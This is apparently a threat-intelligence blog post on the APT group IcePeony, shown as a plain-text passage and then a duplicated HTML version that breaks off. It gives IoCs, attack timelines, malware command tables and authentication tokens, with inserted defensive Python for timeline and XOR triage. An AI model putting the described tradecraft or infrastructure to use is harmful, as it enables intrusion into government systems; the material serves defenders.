This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations. By the way, have you heard of the term “996 working hour system”? This term originated in China’s IT industry. In China’s IT industry, long working hours see as a problem. It refers to working from 9 a.m. to 9 p.m.,six days a week. Such hard work conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. https://en.wikipedia.org/wiki/996_working_hour_system Next, There is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used. IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, We found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog. It was a not well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, where as IceCache has more commands added to it. https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon. What about Mauritius? Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently formed a cooperation with India. 
They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. https://www.mea.gov.in/newsdetail1.htm?12042/ We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted. Wrap-Up In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward. 
IoCs IP 165[.]22.211.62 64[.]227.133.248 173[.]208.156.19 173[.]208.156.144 154[.]213.17.225 103[.]150.186.219 63[.]141.255.16 204[.]12.205.10 107[.]148.37.63 103[.]99.60.119 154[.]213.17.237 45[.]195.205.88 154[.]213.17.244 103[.]99.60.93 149[.]115.231.17 149[.]115.231.39 103[.]99.60.108 Domain d45qomwkl[.]online k9ccin[.]com k8ccyn[.]com 88k8cc[.]com googlesvn[.]com IceCache 484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f 5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811 ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950 11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63 de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681 535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd 0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd 5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46 3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6 0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77 IceEvent 80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58 9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e 9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b
    <p><img src="https://nao-sec.org/assets/2024-10-17/top.png" alt="" /></p> <p>This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present.</p> <p><a href="https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/">https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/</a></p> <h2 id="tldr">tl;dr</h2> <p>We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks.</p> <ul> <li>IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam.</li> <li>Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”.</li> <li>Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions.</li> </ul> <h2 id="icepeony">IcePeony</h2> <p>IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India.</p> <p>They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials.</p> <p>We believe IcePeony works for China’s national interests. 
It is possible that they prioritize China’s maritime strategy.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/1.png" alt="" /></p> <p>Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may also have attacked Brazil. It is likely that they will expand their targets in the future.</p> <h2 id="opsec-fail">OPSEC fail</h2> <p>In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/2.png" width="60%" /></p> <p>Like bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack.</p> <p>Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/3.png" alt="" /></p> <p>The zsh_history was not the only interesting file; there were many others.</p> <p>For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly display help information.</p> <p>Here is an example with Mimikatz. By typing “hPass”, the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/4.png" alt="" /></p> <h2 id="intrusion-timeline">Intrusion Timeline</h2> <p>We obtained two weeks’ worth of command history from the zsh_history. 
Let’s go through the events of each day.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/5.png" alt="" /></p> <ul> <li>Day 1: the attacker attempted SQL injection against several government websites. Where the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack.</li> <li>Day 2: they reviewed the domain information of compromised hosts and created accounts for further exploitation.</li> <li>Day 3 (a Sunday): no actions were taken. It seems the attacker does not work on Sundays.</li> <li>Day 4: they used IceCache to configure proxy rules. We will explain this in more detail later.</li> <li>Day 5: the attacker expanded their reach with more SQL injection attempts against other government websites.</li> <li>Day 6: they used various tools, including IcePeony’s custom tool StaX and the Diamorphine rootkit.</li> <li>Day 7: they continued to attack other hosts using tools such as URLFinder and sqlmap.</li> </ul> <p><img src="https://nao-sec.org/assets/2024-10-17/6.png" alt="" /></p> <ul> <li>Day 8: they used IceCache to steal information from the compromised environment, focusing on domain users.</li> <li>Day 9: they were quiet and only performed connection checks.</li> <li>Day 10 (a Sunday): no activity.</li> <li>Day 11: they used tools such as craXcel and WmiExec. craXcel is an open-source tool for removing password protection from Microsoft Office files.</li> <li>Day 12: they used IceCache to add proxy rules and set up persistence with scheduled tasks.</li> <li>Days 13 and 14: they explored other hosts for further exploitation.</li> </ul> <p>Over the course of two weeks, the attacker used a variety of tools and commands to compromise government websites and exfiltrate information.</p> <h2 id="tools">Tools</h2> <p>IcePeony uses a wide range of tools, with a particular preference for open-source ones. 
Here, we will highlight only the most distinctive tools they use.</p> <h3 id="stax">StaX</h3> <p>StaX is a customized variant of Stowaway, an open-source high-performance proxy tool. The attacker extended Stowaway with custom processing. Based on development strings, we call this version StaX.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/9.png" width="70%" /></p> <p>StaX adds encryption, using a custom Base64 and AES, for the communication targets specified in active mode.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/7.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2024-10-17/8.png" alt="" /></p> <h3 id="proxychains">ProxyChains</h3> <p>ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/10.png" alt="" /></p> <p>info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history.</p> <p>linux_back.sh is a script for backdooring and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users.</p> <p>Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/11.png" alt="" /></p> <h2 id="malware">Malware</h2> <p>The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache against the internet-facing servers that formed their attack surface. Additionally, during the investigation we discovered another related malware, which we called IceEvent. No logs of IceEvent being used were found. 
We believe it was used to compromise another computer that was not connected to the internet.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/12.png" alt="" /></p> <h3 id="icecache">IceCache</h3> <p>IceCache is an ELF64 binary developed in the Go language. It is customized from the open-source software reGeorge.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/13.png" width="60%" /></p> <p>To facilitate their intrusion operations, they added file transmission commands and command execution functionality.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/14.png" alt="" /></p> <p>The IceCache module is installed and run on IIS servers. The number of commands changes between samples, but the samples fall into two types based on their authentication tokens. We found files with PDB information still present. These files were developed by a user named “power” in a project called “cachsess”.</p> <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb</td> </tr> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb</td> </tr> </tbody> </table> <p>The number of commands changes over time, but they fall into three groups: command execution, SOCKS proxying, and file transfer.</p> <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Execute a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Connection request over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Disconnection over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Read data over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Forward data over the SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>List proxies</td> </tr> <tr> <td>PROXY_DEL</td> <td>Delete a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Clear all proxy settings</td> </tr> <tr> <td>PROXY_SET_JS</td> <td>Set the JavaScript</td> </tr> <tr> <td>PROXY_GET_JS</td> <td>Get the configured JavaScript</td> </tr> <tr> <td>PROXY_ALLOW_PC</td> <td>Allowed-PC settings</td> </tr> <tr> <td>PROXY_CACHE_CLEAR</td> <td>Clear the proxy cache</td> </tr> <tr> <td>PROXY_CACHE_TIME</td> <td>Set the proxy cache time</td> </tr> <tr> <td>FILE_UPLOAD</td> <td>Upload files</td> </tr> <tr> <td>FILE_DOWNLOAD</td> <td>Download files</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Execute a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Connection request over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Disconnection over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Read data over the SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Forward data over the SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>List proxies</td> </tr> <tr> <td>PROXY_DEL</td> <td>Delete a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Clear all proxy settings</td> </tr> <tr> <td>FILE_UPLOAD / FILE_UPLOAD_PRO</td> <td>Upload files</td> </tr> <tr> <td>FILE_DOWNLOAD / FILE_DOWNLOAD_PRO</td> <td>Download files</td> </tr> <tr> <td>IIS_VERSION</td> <td>Show the IIS version</td> </tr> </tbody> </table> <p>These are the IceCache modules found so far. 
The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October 2023. Since the compile time and the first submission are consistent, we believe the timestamps are reliable.</p> <p>Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we gathered from the OpenDir data.</p> <p>The number of commands has changed over time. This shows that the malware’s developers kept improving it while continuing their intrusion operations.</p> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>X-Token</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>5b16d153</td> <td>2024-07-17 09:11:14</td> <td>2024-08-03 04:58:20</td> <td>c8d0b2b9 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>484e2740</td> <td>2024-06-21 03:05:15</td> <td>2024-08-07 09:25:53</td> <td>39d4d6d2 - email</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>11e90e24</td> <td>2024-06-05 03:52:48</td> <td>2024-06-18 12:21:50</td> <td>d9cb313c (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>b8d030ed</td> <td>2024-06-05 03:52:41</td> <td>2024-06-18 10:47:18</td> <td>408f1927 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>ceb47274</td> <td>2024-04-25 09:53:26</td> <td>2024-08-02 21:50:50</td> <td>06ac9f47 (BR)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>d1955169</td> <td>2024-04-21 11:29:25</td> <td>2024-06-18 12:24:39</td> <td>d9cb313c (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>de8f58f0</td> <td>2024-04-21 11:29:10</td> <td>2024-06-18 10:49:53</td> <td>408f1927 (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>535586af</td> <td>2024-03-27 05:08:50</td> <td>2024-04-19 07:57:19</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>0b8b10a2</td> <td>2024-03-27 05:08:57</td> <td>2024-04-18 13:54:16</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>a66627cc</td> <td>2024-02-20 09:36:12</td> <td>2024-03-12 15:17:55</td> <td>a6412166 (VN)</td> <td>16</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>e5f520d9</td> <td>2024-02-01 09:32:21</td> <td>2024-07-17 09:30:54</td> <td>24761b38 (SG)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>3eb56218</td> <td>2023-12-07 03:04:16</td> <td>2024-02-20 13:54:02</td> <td>0f09a1ae (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>5fd5e99f</td> <td>2023-09-27 00:50:46</td> <td>2024-03-24 08:59:02</td> <td>Ca43fb0f (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>0eb60e4c</td> <td>2023-08-23 09:11:24</td> <td>2023-10-18 10:11:00</td> <td>0e8f2a34 (VN)</td> <td>18</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> </tbody> </table> <h3 id="iceevent">IceEvent</h3> <p>IceEvent is a simple passive-mode backdoor that is installed as a service.</p> <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb</td> </tr> </tbody> </table> <p>Two types have been identified based on the command format. Both types have only the minimum necessary commands. The older type was discovered in September 2023, and several samples of the newer type were found in April of this year (2024). 
All of these were submitted from India.</p> <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>FILE:</td> <td>Read files via sockets</td> </tr> <tr> <td>CMD:</td> <td>Execute a process</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>UPFILE</td> <td>Upload files</td> </tr> <tr> <td>DOWNFILE</td> <td>Download files</td> </tr> <tr> <td>CMD</td> <td>Execute a process</td> </tr> </tbody> </table> <p><br /></p> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>80e83118</td> <td>2024-04-25 09:50:58</td> <td>2024-07-25 05:43:08</td> <td>INDIA (99003aca)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9aba997b</td> <td>2024-04-30 04:48:48</td> <td>2024-06-14 05:46:49</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9a0b0439</td> <td>2024-04-25 09:50:58</td> <td>2024-06-14 05:00:08</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>bc94da1a</td> <td>2023-08-23 08:52:46</td> <td>2023-09-05 03:03:57</td> <td>INDIA (81f8b666)</td> <td>2</td> <td>A</td> </tr> </tbody> </table> <h3 id="similarities">Similarities</h3> <p>Based on code similarities with IceCache, we believe IceEvent was developed because a simple passive backdoor was needed during intrusions. Both IceCache and IceEvent use the same XOR key to encode communication data, and the PDB information shows that the same developer created both.</p> <p>This is the XOR-based encoding routine used for communication data, which is identical in both malware families.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/15.png" alt="" /></p> <p>This is the command execution routine, which is also identical in both. 
Since the function calls and branching are exactly the same, we believe both were compiled from the same source code. The other commands also match perfectly.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/16.png" alt="" /></p> <p>The communication data of IceCache and IceEvent is only encoded with the XOR routine described above, so it is easy to decode. Here is an example of decoding the data exchanged during command execution.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/17.png" alt="" /></p> <h2 id="attribution">Attribution</h2> <p>We investigated the attacker’s activity times based on the timestamps in the zsh_history file. We found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., a 14-hour workday. They are remarkably diligent workers.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/18.png" alt="" /></p> <p>Similarly, we investigated how activity changes with the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This suggests that the attackers are not conducting these attacks as a personal activity, but as part of organized, professional operations.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/19.png" alt="" /></p> <p>By the way, have you heard of the term “996 working hour system”? The term originated in China’s IT industry, where long working hours are seen as a problem. It refers to working from 9 a.m. to 9 p.m., six days a week. Such working conditions are called the “996 working hour system”. 
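</p> <p>The timeline in the OPSEC fail section and the hour-of-day and weekday analysis in this Attribution section both come from the same source: timestamped zsh_history entries. The following is an added example, not code from the nao_sec post, showing how that analysis can be reproduced. It assumes the history was written with zsh’s EXTENDED_HISTORY option, which is the only mode in which zsh records timestamps (format <code>: &lt;start_epoch&gt;:&lt;elapsed&gt;;&lt;command&gt;</code>). The history lines inside are constructed sample data, and <code>plausible_utc_offsets</code> is a heuristic of this example, not the post’s method: it lists every time zone in which the operator was never seen working in the middle of the night, which is the band an analyst then narrows with the work-hour pattern and other evidence.</p>

```python
# Added example (not code from the nao_sec post): rebuild an attacker-side
# timeline from a zsh_history file and profile activity by hour and weekday.
# zsh only writes timestamps when EXTENDED_HISTORY is set; the line format is
# ": <start_epoch>:<elapsed_seconds>;<command>". SAMPLE_HISTORY is CONSTRUCTED
# test data, not the recovered file.
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

EXTENDED_LINE = re.compile(r"^: (\d+):(\d+);(.*)$")

# Constructed sample: epochs chosen to fall on 2024-07-01 (Mon) .. 2024-07-08 in UTC.
SAMPLE_HISTORY = """\
: 1719795600:0;uname -a
: 1719840600:3;for h in host-a host-b; do \\
  curl -s "$h"; done
: 1719886500:0;ls -la tools/
: 1719965100:1;cat notes.txt
: 1720101600:0;history | tail
: 1720245600:0;df -h
: 1720402200:2;ls -la loot/
"""


def parse_zsh_history(text):
    """Return a list of (start_epoch, elapsed_seconds, command) tuples.

    A line that does not match the extended format is the continuation of a
    multi-line command; zsh stores those with a trailing backslash on every
    line but the last.
    """
    entries = []
    for line in text.splitlines():
        m = EXTENDED_LINE.match(line)
        if m:
            entries.append((int(m.group(1)), int(m.group(2)), m.group(3)))
        elif entries and entries[-1][2].endswith("\\"):
            start, elapsed, cmd = entries[-1]
            entries[-1] = (start, elapsed, cmd[:-1] + "\n" + line)
    return entries


def timeline(entries, utc_offset_hours):
    """Render entries as (local timestamp string, command) in the given zone."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    return [(datetime.fromtimestamp(start, tz).strftime("%Y-%m-%d %H:%M:%S %a"), cmd)
            for start, _, cmd in entries]


def activity_profile(entries, utc_offset_hours):
    """Count commands per local hour of day and per weekday name."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    by_hour, by_day = Counter(), Counter()
    for start, _, _ in entries:
        local = datetime.fromtimestamp(start, tz)
        by_hour[local.hour] += 1
        by_day[local.strftime("%a")] += 1
    return by_hour, by_day


def plausible_utc_offsets(entries, quiet_hours=range(1, 6)):
    """Offsets (UTC-12 .. UTC+14) under which no command lands in the quiet
    window (default 01:00-05:59 local). Heuristic of this example: timestamps
    alone yield a band of candidate zones, not a single answer."""
    candidates = []
    for offset in range(-12, 15):
        by_hour, _ = activity_profile(entries, offset)
        if not any(by_hour[h] for h in quiet_hours):
            candidates.append(offset)
    return candidates


if __name__ == "__main__":
    entries = parse_zsh_history(SAMPLE_HISTORY)
    for when, cmd in timeline(entries, 8):
        print(when, cmd.splitlines()[0])
    hours, days = activity_profile(entries, 8)
    print("hours:", dict(sorted(hours.items())))
    print("days:", dict(days))
    print("plausible offsets:", plausible_utc_offsets(entries))
```

<p>On the constructed sample the quiet-window heuristic leaves UTC+6 through UTC+10 (and the mirror band UTC-7/-6) as candidates; the post’s UTC+8 sits inside that band, and it is the 8 a.m. to 10 p.m. work pattern and the Sunday gap, not the timestamps alone, that pin it down. A real two-week history gives far more samples and a much narrower band.</p> <p>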
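</p> <p>The Similarities section notes that IceCache and IceEvent traffic is only XOR-encoded, and the command tables and sample table above publish the command names, PDB paths and X-Token values. The following is an added example, not code from the nao_sec post or the malware, that turns those published strings into triage helpers: a repeating-key XOR decoder with known-plaintext key recovery, a decoder that checks a request’s command against the command set implied by its X-Token, and a static string-based triage of a file. The XOR key, the request framing (command name followed by a newline) and all sample bytes are constructed placeholders; the real key and framing appear only in the post’s screenshots.</p>

```python
# Added example (not code from the nao_sec post): triage helpers built from the
# strings the post publishes. DEMO_KEY, the request framing and the sample
# bytes are CONSTRUCTED placeholders, not the real IceCache values.

# Command names from the post's TYPE-A / TYPE-B tables.
ICECACHE_CMDS = {
    "A": {"EXEC", "EXEC_PRO", "SOCKS_HELLO", "SOCKS_CONNECT", "SOCKS_DISCONNECT",
          "SOCKS_READ", "SOCKS_FORWARD", "PROXY_ADD", "PROXY_LIST", "PROXY_DEL",
          "PROXY_CLEAR", "PROXY_SET_JS", "PROXY_GET_JS", "PROXY_ALLOW_PC",
          "PROXY_CACHE_CLEAR", "PROXY_CACHE_TIME", "FILE_UPLOAD", "FILE_DOWNLOAD"},
    "B": {"EXEC", "EXEC_PRO", "SOCKS_HELLO", "SOCKS_CONNECT", "SOCKS_DISCONNECT",
          "SOCKS_READ", "SOCKS_FORWARD", "PROXY_ADD", "PROXY_LIST", "PROXY_DEL",
          "PROXY_CLEAR", "FILE_UPLOAD", "FILE_UPLOAD_PRO", "FILE_DOWNLOAD",
          "FILE_DOWNLOAD_PRO", "IIS_VERSION"},
}
ICEEVENT_CMDS = {"A": {"FILE:", "CMD:"}, "B": {"UPFILE", "DOWNFILE", "CMD"}}

# X-Token values and the type they identify, from the post's sample table.
X_TOKENS = {"cbFOvVX1582Mr7nt": "A", "tn7rM2851XVvOFbc": "B"}

# Project-directory fragments of the PDB paths quoted in the post.
PDB_MARKERS = {b"Projects\\cachsess\\": "IceCache",
               b"Projects\\WinService\\": "IceEvent"}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(encoded: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: ciphertext XOR plaintext gives the key stream.
    Possible precisely because the scheme is plain XOR with no cipher behind it."""
    return bytes(c ^ p for c, p in zip(encoded, known_plaintext))


def commands_in(data: bytes, cmd_sets) -> list:
    """Known command names that occur (as ASCII) in data, sorted."""
    found = set()
    for cmds in cmd_sets.values():
        found.update(c for c in cmds if c.encode() in data)
    return sorted(found)


def decode_request(encoded: bytes, key: bytes, x_token: str) -> dict:
    """Decode one captured request body and check its command against the
    command set implied by the X-Token header value."""
    plain = xor_bytes(encoded, key)
    variant = X_TOKENS.get(x_token)
    cmds = commands_in(plain, ICECACHE_CMDS)
    consistent = variant is not None and all(c in ICECACHE_CMDS[variant] for c in cmds)
    return {"variant": variant, "commands": cmds, "consistent": consistent, "plain": plain}


def triage_sample(data: bytes) -> dict:
    """Static triage of a file's bytes using the post's PDB paths, tokens and commands."""
    family = next((f for marker, f in PDB_MARKERS.items() if marker in data), None)
    variant = next((v for tok, v in X_TOKENS.items() if tok.encode() in data), None)
    cmd_sets = ICEEVENT_CMDS if family == "IceEvent" else ICECACHE_CMDS
    return {"family": family, "variant": variant, "commands": commands_in(data, cmd_sets)}


# ---- constructed demo data (placeholders, not captured traffic or a real sample) ----
DEMO_KEY = b"placeholder-key"          # CONSTRUCTED; not the real key
DEMO_REQUEST_PLAIN = b"IIS_VERSION\n"  # assumed framing: command name, newline
DEMO_REQUEST_ENCODED = xor_bytes(DEMO_REQUEST_PLAIN, DEMO_KEY)
DEMO_BINARY = (
    b"\x00" * 16 + b"cbFOvVX1582Mr7nt" + b"\x00PROXY_SET_JS\x00EXEC\x00"
    + b"C:\\Users\\power\\documents\\visual studio 2017\\Projects\\cachsess\\x64\\Release\\cachsess.pdb"
)

if __name__ == "__main__":
    print(decode_request(DEMO_REQUEST_ENCODED, DEMO_KEY, "tn7rM2851XVvOFbc"))
    print(recover_key(DEMO_REQUEST_ENCODED, DEMO_REQUEST_PLAIN))
    print(triage_sample(DEMO_BINARY))
```

<p>Two practical notes. The X-Token check only helps where request headers are actually captured (a reverse proxy or WAF in front of IIS), since default IIS W3C logs do not record custom headers; the static triage, by contrast, works on any file pulled from disk. And a decoded request whose command is not in the set for its token (<code>consistent</code> false) is worth a second look, because the post shows the command set growing with each new build.</p> <p>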
IcePeony might be working under the 996 working hour system.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/20.png" alt="" /></p> <p><a href="https://en.wikipedia.org/wiki/996_working_hour_system">https://en.wikipedia.org/wiki/996_working_hour_system</a></p> <p>Next, there is a very simple point to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here is an example from a wrapper script for the IceCache client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/21.png" alt="" /></p> <p>IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo.</p> <p>Upon investigating reGeorgGo, we found that it was developed by a Chinese security engineer. There is no other information about this project on the internet aside from the developer’s blog; it was not a well-known tool. The publicly available reGeorgGo takes only three arguments, whereas IceCache has had more commands added to it.</p> <p><img src="https://nao-sec.org/assets/2024-10-17/22.png" alt="" /></p> <p><a href="https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo">https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo</a></p> <p>Let’s examine attribution from another angle. In this campaign, IcePeony targeted India, Mauritius, and Vietnam. Attacks on India and Vietnam are not uncommon, but what about Mauritius?</p> <p><img src="https://nao-sec.org/assets/2024-10-17/23.png" width="50%" /></p> <p>Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently established cooperation with India. 
